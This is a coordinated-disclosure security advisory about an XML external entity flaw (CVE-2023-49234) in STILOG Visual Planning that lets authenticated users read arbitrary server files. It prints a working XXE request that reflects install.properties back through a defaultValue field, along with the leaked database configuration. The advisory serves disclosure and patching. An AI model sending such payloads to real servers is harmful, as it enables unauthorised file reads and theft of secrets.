Share
## https://sploitus.com/exploit?id=PACKETSTORM:177961
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Title  
=====  
  
SCHUTZWERK-SA-2023-006: Arbitrary File Read via XML External Entities in   
Visual Planning  
  
Status  
======  
  
PUBLISHED  
  
Version  
=======  
  
1.0  
  
CVE reference  
=============  
  
CVE-2023-49234  
  
Link  
====  
  
https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-006/  
  
Text-only version:  
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-006.txt  
  
Affected products/vendor  
========================  
  
All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.  
  
Summary  
=======  
  
Authenticated attackers can exploit a weakness in the XML parser   
functionality of the Visual Planning[0] application in order to obtain   
read access to arbitrary files on the application server. Depending on   
configured access permissions, this vulnerability could be used by an   
attacker to exfiltrate secrets stored on the local file system.  
  
Risk  
====  
  
An attacker can use the vulnerability to gather information and   
depending on the stored data, exfiltrate secrets from the file system.   
Furthermore, HTTP requests can be used for out-of-bands exfiltration and   
possibly server side request forgery (SSRF) attacks.  
  
Description  
===========  
  
During a recent red teaming assessment, Visual Planning was identified   
as part of the customers internet-facing assets. The software is   
developed by STILOG I.S.T. and provides resource management and   
scheduling features. A security assessment conducted by SCHUTZWERK found   
an arbitrary file read vulnerability via XML external entities in Visual   
Planning.  
The application Admin Center (vpadmin) communicates with the server   
through an XML-based protocol that utilizes proprietary compression   
methods and is transmitted via HTTP. SCHUTZWERK implemented a custom   
proxy as part of an assessment in order to intercept and manipulate the   
messages exchanged between application and server.  
  
One of the messages sent by the Admin Center application after   
authentication is the following:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.parameters.GetApplicationProperty>  
<defaultValue>  
  
</defaultValue>  
<propertyName>PWD</propertyName>  
<rawResult>false</rawResult>  
<section>INSTALLDATA</section>  
<userSession isNull="true"/>  
</com.visualplanning.query.parameters.GetApplicationProperty>  
  
The method GetApplicationProperty is called to request the value of the   
property PWD. The server responds with an XML message, where the value   
element contains the response of the query:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.result.ApplicationPropertyResult>  
<resultValues/>  
<status>OK</status>  
<value>  
  
</value>  
</com.visualplanning.query.result.ApplicationPropertyResult>  
  
In this response it was observed that if the requested property value   
could not be resolved, the content of the request element defaultValue   
will be reflected as part of the response, making it a suitable back   
channel for XML external entity (XXE) injections.  
  
The following message was sent to the Visual Planning application:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE foo [<!ENTITY example SYSTEM   
"C:\xampp2\tomcat\webapps\vplanning\configuration\install.properties"> ]>  
<com.visualplanning.query.parameters.GetApplicationProperty>  
<defaultValue>&example;</defaultValue>  
<propertyName>ShowBackground</propertyName>  
<rawResult>false</rawResult>  
<section>Application</section>  
<userSession isNull="true"/>  
</com.visualplanning.query.parameters.GetApplicationProperty>  
  
The server responds with the content of the requested install.properties   
file inside the value element, thus confirming the XML parser is   
vulnerable to XML external entity (XXE) injections:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.result.ApplicationPropertyResult>  
<resultValues/>  
<status>OK</status>  
<value>#  
#Tue Oct 03 15:37:33 CEST 2023  
INSTALLDATA.INSTALLSERIAL=  
INSTALLDATA.INSTALLURL=http\://127.0.0.1\:8080/vplanning  
INSTALLDATA.OK=Next  
INSTALLDATA.PAGE=PROVIDER  
INSTALLDATA.POOLMODE=1  
INSTALLDATA.PORT=3306  
INSTALLDATA.PROVIDERTYPE=MySQL  
INSTALLDATA.PWD=ENCODE\:  
INSTALLDATA.SERVER=127.0.0.1  
INSTALLDATA.SERVERLANG=de  
INSTALLDATA.USER=root  
INSTALLDATA.VIEWERSERIAL=  
</value>  
</com.visualplanning.query.result.ApplicationPropertyResult>  
  
Further testing showed that out-of-bands exfiltration via HTTPS requests   
is also generally possible.  
  
Solution/Mitigation  
===================  
  
The vendor suggests to update to Visual Planning 8 (Build 240207)  
  
Disclosure timeline  
===================  
  
2023-11-01: Vulnerability discovered  
2023-11-09: Contact vendor in order to determine security contact  
2023-11-10: Received generic sales response from vendor  
2023-11-14: Contacted CTO of vendor directly  
2023-11-16: Vulnerabilities demonstrated in call with contact at vendor  
2023-11-24: CVE assigned by Mitre  
2023-11-24: Additional technical details provided to vendor  
2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings   
is in progress  
2024-01-30: Inquired about mitigation status regarding the reported   
vulnerabilities  
2024-01-30: Vendor informed SCHUTZWERK that some of the issues were   
already fixed  
2024-03-08: Sent advisory drafts to vendor  
2024-03-28: Received patch information and release of advisory  
  
Contact/Credits  
===============  
  
The vulnerability was discovered during an assessment by Lennert Preuth   
and David Brown of SCHUTZWERK GmbH.  
  
References  
==========  
  
[0] https://www.visual-planning.com/en/  
  
Disclaimer  
==========  
  
The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may   
be updated in order to provide as accurate information as possible. The   
most recent version of this security advisory can be found at SCHUTZWERK   
GmbH's website ( https://www.schutzwerk.com ).  
  
Additional information  
======================  
  
SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/  
  
SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/  
-----BEGIN PGP SIGNATURE-----  
  
iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0bcaHGFkdmlzb3Jp  
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrsdwA/+MyfbZTe36+AYi9q6GJE6  
S75Xm2aZtEM3NC5F6aMcELqFEW7LNjERmBoqfkHe+SWfgFxeCXl/XelHaNnR7HTM  
ZZPCGwJmOI+XaraInPVdCDw1QVIdiCG4VZzE0tlnFbLBgM+OTOxcDOoG7OhzP6mm  
ALfankzxu3AfbZhwebQtSXIQ+YqjitTsvjQGPleylqYK5CJbChsyvmMjomu/GzdO  
sWQ25ODCVUy6VORet8yn5OkQnM2CjSkteuTdNxCzd6JUB+vQ0g5FCE5NVzkqYq21  
YJ4Fc3PgkyAnrGefSbueL+Z/K6btM8RysJAwGahIEOdlkG8W/p09L0QQUGERT2VN  
UO6oTi/1OyoJBV9L5umr6aHss3P92ln90UAUW2dlZOdGSB8rlXisxLC1wtFZAXH9  
YwiGY/ACXmV1FtQQpgFxfNRyEWaltU5S0Y0bPAaW+ABSMLlK4X0Ft9E/4s4Yel2d  
TGngEnVKcR/PKNtrJbBqPDwt98R0MdQi0QxBRaxGxAg4Yr1qex8ph6IRT7bDTm0/  
1CKlQL7y9uvXlnFE4CO3IkKNp0ejKn3A7QEep4jit07VItIc+sRsoMnB6v54DoML  
ZfIisDoijb3doTNieyMpgTGZTDWLwLO36IS9JiqafNCAnngExqylFX6vYQVggtRz  
mZ2yA2/9ZfQwOawEirQtQr8=  
=TUGM  
-----END PGP SIGNATURE-----  
  
--   
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany  
Zertifiziert / Certified ISO 27001, 9001 and TISAX  
  
Phone +49 731 977 191 0  
  
advisories@schutzwerk.com / www.schutzwerk.com  
  
Geschäftsführer / Managing Directors:  
Jakob Pietzka, Michael Schäfer  
  
Amtsgericht Ulm / HRB 727391  
Datenschutz / Data Protection www.schutzwerk.com/datenschutz